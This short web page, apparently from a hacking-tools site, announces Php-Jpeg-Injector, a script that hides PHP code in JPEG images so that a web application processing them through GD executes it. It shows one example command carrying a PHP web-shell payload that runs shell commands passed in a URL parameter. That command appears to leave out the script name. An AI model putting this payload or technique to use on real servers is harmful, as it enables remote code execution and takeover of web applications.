Php-Jpeg-Injector - Injects Php Payloads Into Jpeg Images

Php-Jpeg-Injector – Injects Php Payloads Into Jpeg Images

Injects php payloads into jpeg images. Related to this post.

Use Case

You have a web application that runs a jpeg image through PHP’s GD graphics library.


This script injects PHP code into a specified jpeg image. The web application will execute the payload if it interprets the image. Make sure your input jpeg is uncompressed!



e.g. python3 cat.jpeg '<?php system($_GET["cmd"]);?>' infected_cat.jpeg

How it works

PHP code is injected in the null/garbage (brown) space after the scan header:

The new infected jpeg is run through PHP’s gd-library. PHP interprets the payload injected in the jpeg and executes it.

Leave a Reply

Your email address will not be published. Required fields are marked *

Special Offer for Hackers!Sign up to get your $5 Coupon code, weekly deals and latest hacking tools straight to your inbox!